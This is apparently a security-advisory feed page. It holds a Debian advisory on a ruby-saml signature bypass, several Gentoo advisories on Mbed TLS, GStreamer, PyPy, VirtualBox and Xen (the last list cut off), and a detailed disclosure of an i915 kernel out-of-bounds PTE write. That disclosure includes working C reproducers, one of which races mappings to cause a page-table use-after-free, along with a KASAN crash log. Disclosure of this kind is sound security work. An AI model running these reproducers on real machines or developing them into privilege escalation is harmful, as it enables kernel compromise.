Debian Linux Security Advisory 5774-1 - It was discovered that ruby-saml, a SAML library implementing the client side of a SAML authorization, does not properly verify the signature of the SAML Response, which could result in bypass of authentication in an application using the ruby-saml library.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5774-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 20, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ruby-samlCVE ID         : CVE-2024-45409Debian Bug     : 1081560It was discovered that ruby-saml, a SAML library implementing the clientside of a SAML authorization, does not properly verify the signature ofthe SAML Response, which could result in bypass of authentication in anapplication using the ruby-saml library.For the stable distribution (bookworm), this problem has been fixed inversion 1.13.0-1+deb12u1.We recommend that you upgrade your ruby-saml packages.For the detailed security status of ruby-saml please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ruby-samlFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmbtwvxfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0T5Rw//chUPp0lZSQP5tWnyblbMyBbmVbqSfl1genngyWPv0aKts/ugJ1GBOw8in26OOvcn+clgSFa3LQRw3FPkRxSuKtnLs2xHc++tcG46YdpFT1JEc26KpEuBu6d6nCaMKfoveWSoNvhT3TGo3CMM/SKvxsc2KQgr3x9cJWr892m54MSqB3PUA0jYlCPu8s5EOyygkTf4T0Ogjjcz+IUWwEmuzqyazsSu8GyLx1DVyKyomMVrjNq3b9DhTR5WxK+X6miVVyldfccfG4khFAR9RvpIVltBpQBnjaCmWGn+ryKu23vN5eZoA2Cb+qToEVFd/2HwbXaLowVDyChbtuKhaR+M3pGgCRW2AYHFILZxYWM0+hgMx4NOgIANywm5xsK+hYEPJdWyI5sYqq/OUINKZOcw+m/xGf7hZTcctuPp3w4lNxGxINZOnl11Bv01tQjK1PtsIuVDWX3bk6hk7h4Y5khedyDhceAk/ENbZs9r79ejoGYRHiMhtUpnQep33zXSZdsD051v1VIWq6Wrb2HFu5EABNRJ6EdzfjilXperDnwTYvgjktAwwmvWDhyPv0Ii5d+81HntH6koeT7YCWAJp6EFMCf+8PmkZPeC60hxZ6lGscFMJJp6iqkXdw7fKSVV4tsEAD73sCgGs90voChnvxM7EFdVA3z4VfVnV9nm4GhF5O4=TVF9-----END PGP SIGNATURE-----

Debian Security Advisory 5774-1

Linux i915 suffers from an out-of-bounds PTE write in vm_fault_gtt() that leads to a PTE use-after-free vulnerability.

    I found a bug in the i915 code that allows a process with access to a rendernode (/dev/dri/renderD128) to corrupt kernel memory.This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-08-28.Summaryvm_fault_gtt() calls remap_io_mapping with an incorrect size; it should limitthe size to area->vm_end - {address passed to remap_io_mapping} instead ofarea->vm_end - area->vm_start.Bug description[For people reading this bug report who are not i915 experts: I highly recommendfirst reading sima's "i915/GEM Crashcourse" athttps://blog.ffwll.ch/2013/01/i915gem-crashcourse-overview.html. I wouldn'thave understood what's going on in this code without reading that.]I found a bug in vm_fault_gtt() in drivers/gpu/drm/i915/gem/i915_gem_mman.c.PTEs pointing into the GTT MMIO window are written as follows:/\* Now pin it into the GTT as needed \*/  vma = i915_gem_object_ggtt_pin_ww(obj, &ww, NULL, 0, 0,                                    PIN_MAPPABLE |                                    PIN_NONBLOCK /\* NOWARN \*/ |                                    PIN_NOEVICT);  if (IS_ERR(vma) && vma != ERR_PTR(-EDEADLK)) {          /\* Use a partial view if it is bigger than available space \*/          struct i915_gtt_view view =                  compute_partial_view(obj, page_offset, MIN_CHUNK_PAGES);  [...]          vma = i915_gem_object_ggtt_pin_ww(obj, &ww, &view, 0, 0, flags);  [...]  }  [...]  /\* Finally, remap it using the new GTT offset \*/  ret = remap_io_mapping(area,                         area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT),                         (ggtt->gmadr.start + i915_ggtt_offset(vma)) >> PAGE_SHIFT,                         min_t(u64, vma->size, area->vm_end - area->vm_start),                         &ggtt->iomap);  In the case where the first i915_gem_object_ggtt_pin_ww() call refuses tomap the whole object into the GTT MMIO window, for example because theobject is too big to fit into the window, a subrange of the object is mappedinstead. When this happens and the subrange is not at the start of the VMA,vma->gtt_view.partial.offset is nonzero.In this case, the size parameter passed to remap_io_mapping() is calculatedwrong: It is limited to the size of the VMA (area->vm_end - area->vm_start),but with an address that is higher than where the VMA starts(area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT)), so theend address is only limited toarea->vm_end + (vma->gtt_view.partial.offset << PAGE_SHIFT).When the VMA covers the whole object, this has no bad consequences because ofthe min_t(); but if the VMA is shorter than the object, PTEs can be writtenout of bounds.This can be tested with the following reproducer - on my system it causes"BUG: Bad page map" and "Bug: Bad rss-counter" errors when the reproducertries to exit:// written for a device with Xe Graphics (TGL GT2)    #define _GNU_SOURCE  #include <err.h>  #include <fcntl.h>  #include <stdio.h>  #include <inttypes.h>  #include <sys/ioctl.h>  #include <sys/mman.h>  #include <drm/i915_drm.h>    #define SYSCHK(x) ({          \    typeof(x) __res = (x);      \    if (__res == (typeof(x))-1) \      err(1, "SYSCHK(" #x ")"); \    __res;                      \  })    #define MiB \*(1024\*1024)    void poke(volatile char \*p) {    printf("poking      %p\n", p);    \*p = 1;  }    int main(void) {    int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));      struct drm_i915_gem_create gem_create = {      .size = 257 MiB /\* a bit over half the GGTT aperture size on my machine \*/    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));    printf("created GEM 0x%x\n", gem_create.handle);      struct drm_i915_gem_mmap_offset mmap_offset_arg = {      .handle = gem_create.handle,      .flags = I915_MMAP_OFFSET_GTT    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));    printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);    #define MAP_SIZE (128 MiB - 0x80000)    volatile char \*map = (volatile char \*)SYSCHK(mmap(NULL, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd, mmap_offset_arg.offset));    printf("mapped from %p\n", map);    poke(map + MAP_SIZE - 0x1000);    poke(map);    printf("mapped to   %p\n", map + MAP_SIZE);  }  Code historyThe current form of the buggy code is from commit c58305af1835 ("drm/i915: Useremap_io_mapping() to prefault all PTE in a single pass", landed in v4.9), butI think back then it was unreachable because the code for constructing a partialview limited the partial view's size based on the VMA bounds back then:                view.params.partial.size =                          min_t(unsigned int, chunk_size,                                (area->vm_end - area->vm_start) / PAGE_SIZE -                                view.params.partial.offset);  This safety was removed in commit 8201c1fad4f4 ("drm/i915: Clip the partialview against the object not vma", first in v4.11). I suspect the bug becamehittable after that point.Most places in the kernel that install PFNMAP PTEs use helpers likeremap_pfn_range() that make sure the passed range fits into the specified VMA;but it looks like i915 doesn't use those because it wants to be able to clobberexisting PTEs, which the usual helpers treat as an error.(See commit 0e4fe0c9f2f9 ("Revert "i915: use io_mapping_map_user"").)i915 instead uses its own helper remap_io_mapping(), which just writes PTEsin the specified virtual address range.ExploitabilityOne consequence of this bug is that, because PFNMAP PTEs are written outside theregion covered by the VMA, the MM subsystem can't shoot them down when thedriver wants to revoke userspace's access to the region. So this could probablybe used to gain access to memory that is later mapped into the GTT in the MMIOwindow - but I don't know enough about i915 to tell whether that is bad orwhether shaders always have access to all GTT memory anyway.Probably another consequence would be that if you had a VMA at the end of theuserspace virtual address space, you could get memory mapped into the kernelhalf of memory? But that probably wouldn't lead to anything overly bad...The one way I know of to turn this bug into something that is definitely badis to turn it into page table UAF, like inhttps://crbug.com/project-zero/2350:When you're only holding the mmap_lock in read mode (like in a page faulthandler), page tables that are not needed by any VMA can be freed concurrently.So if we have one GTT-backed VMA directly ahead of a second VMA, and thenconcurrently trigger a fault in the GTT-backed VMA while unmapping the secondVMA, the out-of-bounds page table access off of the first VMA can walk pagetables that are concurrently freed.I tested this in a v6.9.2 kernel build with CONFIG_KASAN=y (for detecting UAFaccess) and CONFIG_RCU_STRICT_GRACE_PERIOD=y (a debugging option that makes RCUgrace periods much shorter at the expense of performance, which makes it easierto detect use-after-free bugs for objects that are RCU-freed), using thefollowing reproducer, running on a system with Xe Graphics (TGL GT2):// written for a device with Xe Graphics (TGL GT2)    #define _GNU_SOURCE  #include <pthread.h>  #include <err.h>  #include <fcntl.h>  #include <stdio.h>  #include <inttypes.h>  #include <sys/ioctl.h>  #include <sys/mman.h>  #include <drm/i915_drm.h>    #define SYSCHK(x) ({          \    typeof(x) __res = (x);      \    if (__res == (typeof(x))-1) \      err(1, "SYSCHK(" #x ")"); \    __res;                      \  })    #define MiB \*(1024\*1024)    // virtual address at the boundary between PGD entries  #define PGD_BOUNDARY_ADDR 0x8000000000    #define MAP_SIZE (128 MiB - 0x80000)  #define LEFT_MAPPING_ADDR (PGD_BOUNDARY_ADDR - MAP_SIZE)    #define FLIPPER_MAP_SIZE 0x200000    static void \*flipper_thread_fn(void \*dummy) {    int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));      struct drm_i915_gem_create gem_create = {      .size = FLIPPER_MAP_SIZE    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));    printf("flipper created GEM 0x%x\n", gem_create.handle);      struct drm_i915_gem_mmap_offset mmap_offset_arg = {      .handle = gem_create.handle,      .flags = I915_MMAP_OFFSET_GTT    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));    printf("flipper fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);    while (1) {      SYSCHK(mmap((void\*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset));      SYSCHK(munmap((void\*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE));    }    return NULL;  }    int main(void) {    pthread_t flipper_thread;    if (pthread_create(&flipper_thread, NULL, flipper_thread_fn, NULL))      errx(1, "pthread_create");      int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));      struct drm_i915_gem_create gem_create = {      .size = 257 MiB /\* a bit over half the GGTT aperture size on my machine \*/    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));    printf("created GEM 0x%x\n", gem_create.handle);      struct drm_i915_gem_mmap_offset mmap_offset_arg = {      .handle = gem_create.handle,      .flags = I915_MMAP_OFFSET_GTT    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));    printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);      while (1) {      SYSCHK(mmap((void\*)LEFT_MAPPING_ADDR, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset));      \*(volatile char \*)(PGD_BOUNDARY_ADDR - 0x1000);      SYSCHK(munmap((void\*)LEFT_MAPPING_ADDR, MAP_SIZE));    }  }  With that, I quickly got a KASAN splat (guess unwind lines removed):[  906.394685] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF  [  906.657887] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF  [  906.819808] ==================================================================  [  906.819819] BUG: KASAN: use-after-free in pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)  [  906.819827] Read of size 8 at addr ffff888180919000 by task linux-i915-oob-/3809    [  906.819832] CPU: 3 PID: 3809 Comm: linux-i915-oob- Not tainted 6.9.2 #3  [  906.819835] Hardware name: [...]  [  906.819838] Call Trace:  [  906.819839]  <TASK>  [  906.819841] dump_stack_lvl (lib/dump_stack.c:117 (discriminator 1))  [  906.819847] print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)  [  906.819859] kasan_report (mm/kasan/report.c:603)  [  906.819865] pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)  [  906.819869] __pte_alloc (mm/memory.c:445)  [  906.819886] __apply_to_page_range (mm/memory.c:2728 mm/memory.c:2788 mm/memory.c:2824 mm/memory.c:2860 mm/memory.c:2894)  [  906.819893] remap_io_mapping (drivers/gpu/drm/i915/i915_mm.c:110)  [  906.819905] vm_fault_gtt (drivers/gpu/drm/i915/gem/i915_gem_mman.c:411)  [  906.819924] __do_fault (mm/memory.c:4531)  [  906.819927] do_fault (mm/memory.c:4894 mm/memory.c:5024)  [  906.819931] __handle_mm_fault (mm/memory.c:3880 mm/memory.c:5300 mm/memory.c:5441)  [  906.819948] handle_mm_fault (mm/memory.c:5466 mm/memory.c:5622)  [  906.819951] do_user_addr_fault (arch/x86/mm/fault.c:1384)  [  906.819959] exc_page_fault (./arch/x86/include/asm/irqflags.h:37 ./arch/x86/include/asm/irqflags.h:72 arch/x86/mm/fault.c:1482 arch/x86/mm/fault.c:1532)  [  906.819963] asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:623)  [  906.819967] RIP: 0033:0x561a370af516  [ 906.819970] Code: 48 83 7d e8 ff 75 19 48 8d 05 26 0d 00 00 48 89 c6 bf 01 00 00 00 b8 00 00 00 00 e8 64 fb ff ff 48 b8 00 f0 ff ff 7f 00 00 00 <0f> b6 00 be 00 00 f8 07 48 b8 00 00 08 f8 7f 00 00 00 48 89 c7 e8  All code  ========     0:   48 83 7d e8 ff          cmpq   $0xffffffffffffffff,-0x18(%rbp)     5:   75 19                   jne    0x20     7:   48 8d 05 26 0d 00 00    lea    0xd26(%rip),%rax        # 0xd34     e:   48 89 c6                mov    %rax,%rsi    11:   bf 01 00 00 00          mov    $0x1,%edi    16:   b8 00 00 00 00          mov    $0x0,%eax    1b:   e8 64 fb ff ff          call   0xfffffffffffffb84    20:   48 b8 00 f0 ff ff 7f    movabs $0x7ffffff000,%rax    27:   00 00 00    2a:\*  0f b6 00                movzbl (%rax),%eax              <-- trapping instruction    2d:   be 00 00 f8 07          mov    $0x7f80000,%esi    32:   48 b8 00 00 08 f8 7f    movabs $0x7ff8080000,%rax    39:   00 00 00    3c:   48 89 c7                mov    %rax,%rdi    3f:   e8                      .byte 0xe8    Code starting with the faulting instruction  ===========================================     0:   0f b6 00                movzbl (%rax),%eax     3:   be 00 00 f8 07          mov    $0x7f80000,%esi     8:   48 b8 00 00 08 f8 7f    movabs $0x7ff8080000,%rax     f:   00 00 00    12:   48 89 c7                mov    %rax,%rdi    15:   e8                      .byte 0xe8  [  906.819973] RSP: 002b:00007ffdd0b75430 EFLAGS: 00010213  [  906.819976] RAX: 0000007ffffff000 RBX: 00007ffdd0b755a8 RCX: 00007f8a3a3848a3  [  906.819978] RDX: 0000000000000003 RSI: 0000000007f80000 RDI: 0000007ff8080000  [  906.819980] RBP: 00007ffdd0b75490 R08: 0000000000000003 R09: 0000000135188000  [  906.819982] R10: 0000000000100001 R11: 0000000000000246 R12: 0000000000000000  [  906.819984] R13: 00007ffdd0b755b8 R14: 0000561a370b1dd8 R15: 00007f8a3a4b9020  [  906.819987]  </TASK>    [  906.819990] The buggy address belongs to the physical page:  [  906.819992] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x180919  [  906.819994] flags: 0x4000000000000000(zone=1)  [  906.819997] page_type: 0xffffffff()  [  906.820000] raw: 4000000000000000 ffffea0006024688 ffffea0006024788 0000000000000000  [  906.820002] raw: 0000000000000000 0000000000000001 00000000ffffffff 0000000000000000  [  906.820004] page dumped because: kasan: bad access detected    [  906.820006] Memory state around the buggy address:  [  906.820008]  ffff888180918f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [  906.820010]  ffff888180918f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [  906.820011] >ffff888180919000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  [  906.820013]                    ^  [  906.820014]  ffff888180919080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  [  906.820016]  ffff888180919100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  [  906.820017] ==================================================================  This bug is probably not very interesting on Linux servers, since access tothe render node is typically only granted to UIDs who have locally signed into a machine; but it is probably relevant for things like ChromeOS, and maybealso for escaping from some types of sandboxed desktop applications?Related CVE Number: CVE-2024-42259.Found by: jannh@google.com

Linux i915 PTE Use-After-Free

Gentoo Linux Security Advisory 202409-14 - Multiple vulnerabilities have been discovered in Mbed TLS, the worst of which could lead to information disclosure or denial of service. Versions greater than or equal to 2.28.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-14  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Mbed TLS: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #886001, #923279  
       ID: 202409-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mbed TLS, the worst of  
which could lead to information disclosure or denial of service.

Background  
==========

Mbed TLS (previously PolarSSL) is an “easy to understand, use, integrate  
and expand” implementation of the TLS and SSL protocols and the  
respective cryptographic algorithms and support code required.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-libs/mbedtls  < 2.28.7      >= 2.28.7

Description  
===========

Multiple vulnerabilities have been discovered in Mbed TLS. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mbed TLS users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/mbedtls-2.28.7"

References  
==========

[ 1 ] CVE-2022-46392  
      https://nvd.nist.gov/vuln/detail/CVE-2022-46392  
[ 2 ] CVE-2022-46393  
      https://nvd.nist.gov/vuln/detail/CVE-2022-46393  
[ 3 ] CVE-2023-43615  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43615  
[ 4 ] CVE-2023-45199  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45199  
[ 5 ] CVE-2024-23170  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23170  
[ 6 ] CVE-2024-23775  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23775

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-14

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-14

Gentoo Linux Security Advisory 202409-13 - Multiple vulnerabilities have been discovered in gst-plugins-good, the worst of which could lead to denial of service or arbitrary code execution. Versions greater than or equal to 1.20.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: gst-plugins-good: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #859418  
       ID: 202409-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in gst-plugins-good, the  
worst of which could lead to denial of service or arbitrary code  
execution.

Background  
==========

gst-plugins-good contains a set of plugins for the GStreamer open source  
multimedia framework.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
media-libs/gst-plugins-good  < 1.20.3      >= 1.20.3

Description  
===========

Multiple vulnerabilities have been discovered in gst-plugins-good.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All gst-plugins-good users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/gst-plugins-good-1.20.3"

References  
==========

[ 1 ] CVE-2022-1920  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1920  
[ 2 ] CVE-2022-1921  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1921  
[ 3 ] CVE-2022-1922  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1922  
[ 4 ] CVE-2022-1923  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1923  
[ 5 ] CVE-2022-1924  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1924  
[ 6 ] CVE-2022-1925  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1925  
[ 7 ] CVE-2022-2122  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2122

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-13

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-13

Gentoo Linux Security Advisory 202409-12 - Multiple vulnerabilities have been discovered in pypy and pypy3, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 7.3.3_p37_p1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: pypy, pypy3: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #741496, #741560, #774114, #782520  
       ID: 202409-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in pypy and pypy3, the  
worst of which could lead to arbitrary code execution.

Background  
==========

A fast, compliant alternative implementation of the Python language.

Affected packages  
=================

Package                  Vulnerable         Unaffected  
-----------------------  -----------------  ------------------  
dev-python/pypy          < 7.3.3_p37_p1-r1  >= 7.3.3_p37_p1-r1  
dev-python/pypy-exe      < 7.3.2            >= 7.3.2  
dev-python/pypy-exe-bin  < 7.3.2            Vulnerable!  
dev-python/pypy3         < 7.3.3_p37_p1-r1  >= 7.3.3_p37_p1-r1

Description  
===========

Multiple vulnerabilities have been discovered in pypy. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All pypy users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/pypy-7.3.3_p37_p1-r1"  
  # emerge --ask --oneshot --verbose ">=dev-python/pypy-exe-7.3.2"  
  # emerge --ask --oneshot --verbose ">=dev-python/pypy-exe-bin-7.3.2"

All pypy3 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/pypy3-7.3.3_p37_p1-r1"

References  
==========

[ 1 ] CVE-2020-27619  
      https://nvd.nist.gov/vuln/detail/CVE-2020-27619

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-12

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-12

Gentoo Linux Security Advisory 202409-11 - Multiple vulnerabilities have been discovered in Oracle VirtualBox, the worst of which could lead to privilege escalation. Versions greater than or equal to 7.0.12 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Oracle VirtualBox: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #918524  
       ID: 202409-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Oracle VirtualBox, the  
worst of which could lead to privilege escalation.

Background  
==========

VirtualBox is a powerful virtualization product from Oracle.

Affected packages  
=================

Package                   Vulnerable    Unaffected  
------------------------  ------------  ------------  
app-emulation/virtualbox  < 7.0.12      >= 7.0.12

Description  
===========

Multiple vulnerabilities have been discovered in Oracle VirtualBox.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Oracle VirtualBox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/virtualbox-7.0.12"

References  
==========

[ 1 ] CVE-2023-22098  
      https://nvd.nist.gov/vuln/detail/CVE-2023-22098  
[ 2 ] CVE-2023-22099  
      https://nvd.nist.gov/vuln/detail/CVE-2023-22099  
[ 3 ] CVE-2023-22100  
      https://nvd.nist.gov/vuln/detail/CVE-2023-22100

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-11

Gentoo Linux Security Advisory 202409-10 - Multiple vulnerabilities have been discovered in Xen, the worst of which could lead to privilege escalation. Versions greater than or equal to 4.17.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Xen: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #918669, #921355, #923741, #928620, #929038  
       ID: 202409-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Xen, the worst of which  
could lead to privilege escalation.

Background  
==========

Xen is a bare-metal hypervisor.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
app-emulation/xen  < 4.17.4      >= 4.17.4

Description  
===========

Multiple vulnerabilities have been discovered in Xen. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Xen users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.17.4"

References  
==========

[ 1 ] CVE-2022-4949  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4949  
[ 2 ] CVE-2022-42336  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42336  
[ 3 ] CVE-2023-28746  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28746  
[ 4 ] CVE-2023-34319  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34319  
[ 5 ] CVE-2023-34320  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34320  
[ 6 ] CVE-2023-34321  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34321  
[ 7 ] CVE-2023-34322  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34322  
[ 8 ] CVE-2023-34323  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34323  
[ 9 ] CVE-2023-34324  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34324  
[ 10 ] CVE-2023-34325  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34325  
[ 11 ] CVE-2023-34327  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34327  
[ 12 ] CVE-2023-34328  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34328  
